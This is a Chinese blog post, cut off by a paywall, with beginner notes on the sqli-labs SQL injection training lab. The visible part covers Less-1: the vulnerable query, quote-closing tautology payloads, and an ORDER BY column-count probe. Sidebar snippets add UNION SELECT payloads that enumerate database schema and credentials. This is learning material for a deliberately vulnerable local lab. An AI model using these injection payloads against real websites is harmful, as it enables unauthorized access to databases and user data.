sqli-lab详解——做题笔记1-10(入门级注解)

最新推荐文章于 2024-04-29 09:09:06 发布
VIP文章 最新推荐文章于 2024-04-29 09:09:06 发布
阅读量2.5k 收藏 6
点赞数 1
分类专栏: SQL注入 文章标签: SQL注入 sqli-labs 笔记 入门 习题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dream__catcher/article/details/82964394
版权

(题目标题是自己翻译的,水平和理解有限,可能翻译的不够准确到位,可能也不是专业术语,仅供参考,见谅!)
less-1 基于报错-单引号字符串
源码:SELECT * FROM users WHERE id=’$id’ LIMIT 0,1
答案及解析:
http://127.0.0.1/sqli-labs-master/Less-1/?id=
’ or ‘1’='1
’ or 1=1 --+ (–后要加空格才能注释,但是在网址栏输入时最后加空格解析时会被去掉,所以用+,当然用%20也行)
’ or 1=1 # (火狐下在url栏用#注释会报错,改成url编码%23即可)
只要闭合单引号,构造出正确的查询语句即可。但这步只是判断出了SQL注入漏洞的类型,后面还需要进行一系列操作才能获得我们需要的信息,通常是使用联合查询+注释即可获取数据库内容。
进一步操作:
1.首先需要判断数据库字段数,以便后面使用联合查询

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 4--+

其中4是指数据库列数,我们需要不断的换、猜获得,当数字大于数据库列,会得到报错,小于等于则正常返回。题目中数据库有3列,猜到4时报错,改为3则正确

2.然

最低0.47元/天 解锁文章
Dream__Catcher
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-lab通关txt
07-22
sqli-lab1~10的通关txt,其中包含了注入代码以及相关注解 代码由于存储在txt中,无法直接复制使用,请手打。 (可能是由于编码问题)
sql-labs 详解
m0_52314120的博客
03-28 1897
文章目录前言一、第一关1.and 1=2测试 :2.尝试闭合:3.尝试将 ‘ 注释4.利用order by函数爆字段数5.设置错误的id值使其通过报错带出查询结果6.判断回显点7.查询当前库名与用户8.联合查询爆库名9.爆表名10.查询user下的列名11.从username和password中得到账号密码二、第二关总结 前言 sql-labs的注入样例 若有不足请留言指正 一、第一关 1.and 1=2测试 : http://127.0.0.1/sql/Less-1/?id=1 2.尝试闭合: 127
Sql-lab全解
qq_59197927的博客
10-11 290
id=-1 union select null,null,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+group_concat()为输出格式 information_scheam这是个数据库中的表存放着数据库中各个表的信息。这里使用'")判断可能为数值型注入,也就不需要考虑闭合方式,回显大小为3位,位置后两位。
Sqli-lab教程-史上最全详解(1-22通关)
Innocence_0的博客
03-06 535
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
mysql error 1_MYSQL双查询错误1
weixin_39883194的博客
01-19 147
一、基础知识开始讲解MYSQL双查询错误之前,我们先了解一下双查询语句以及需要使用到的几个数据库函数和GROUP BY语句1. 双查询语句先了解一下什么是子查询,子查询就是嵌入第一层select语句中的select语句,比如:SELECT * FROM score WHERE even_id IN (SELECT even_id FROM grade_event WHERE category = ...
sql-labs通关教程
m0_62274649的博客
10-30 791
sqllabs搭建
MYSQL注入(Welcome Dhakkan)
qq_43613772的博客
07-19 7930
第一步打开phpStudy,点击启动 打开浏览器输入要登录的题目网址, 、在网址后面输?id=1看一下效果和在数字1后面加一个符号’比较一下 从上述错误当中,我们可以看到提交到 sql 中的 1’在经过 sql 语句构造后形成 ‘1’’ LIMIT 0,1, 多加了一个 ’ 。我们可以尝试一下后面加尝试 ‘or 1=1–+ 尝试成功,正常返回数据。 接下来对前面的数据进行排序,利用的是order ...
sql-lab 1~5
开心星人的博客
05-12 595
1 ?id=1 ?id=1' ?id=1%27--+ ?id=1' order by 1--+ ?id=1' order by 4--+ 所以有四个字段 ?id=1' union select 1,2,3--+ 因为web页面只能显示一行数据 ?id=-1' union select 1,2,3--+ 将让第一行数据显示不出来 或者 ?id=1' union select 1,2,3 limit 1,1--+ 可以看到有回显的字段2和字段3 ?id=-1' union select 1,2,g
sqli-lab教程——1-35通关
缘木之鱼
05-08 5625
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges)Less-1 GET - Error...
第三节 Sqli-lab环境搭建-01
09-15
第三节 Sqli-lab环境搭建-01
LabSQL应用范例讲解
01-26
Labview用ACTIVEX调用Microsoft ADO,结合SQL语言,通过ODBC API 和驱动访问数据库 带有LabSQL应用范例讲解
sqli-lab操作详解
07-12
sqli-lab操作详解
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
linux系统下操作I2C总线外设(imx6ull的oled显示屏i2c驱动笔记
独行猫a 的沉淀、积累、总结。天天学习,好好向上...c/c++,嵌入式 linux,Android,HarmonyOS)
04-24 1009
在硬件层中,I2C硬件总线只有两条线路,上面可以挂载多个I2C-device,这些I2C-device有的在I2C总线里充当主机的角色,一般情况该主机为板子上的主cpu中的I2C控制器,拿imx6ul板子来说,这个I2C主机就是imx6中的I2C控制器模块。
公文写作笔记
最新发布
332295505的博客
04-29 104
最后一行的日期,后边占4个格子。落款单位在日期的正上方。③结尾:简单的总结(字数紧张时,可以省略)②主题:对策(别人做得好,就借鉴)
恶补《操作系统》2_2——王道学习笔记
qq_47966193的博客
04-24 933
基本概念:通常进程数量大于处理机数量,所以要按照一定的算法选择一个进程,并将处理机分配给它运行,以实现进程的并发执行。被动放弃(分给进程的时间片用完、有更紧急的事需要处理、有更高优先级的进程进入就绪队列)若进程未在一个时间片内执行完,则剥夺处理机,将进程重新放到就绪队列对位重新排队。)算法规则:按照各进程到达就绪队列的顺序,轮流让各个进程执行一个时间片(如。):有新作业进入就绪队列或有作业完成了,考察队列中的最小需要时间的作业。级对头的进程分配时间片,被抢占处理机的进程重新放回原队列队尾。
jstack使用笔记
enthan809882的博客
04-24 737
jstack使用笔记
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值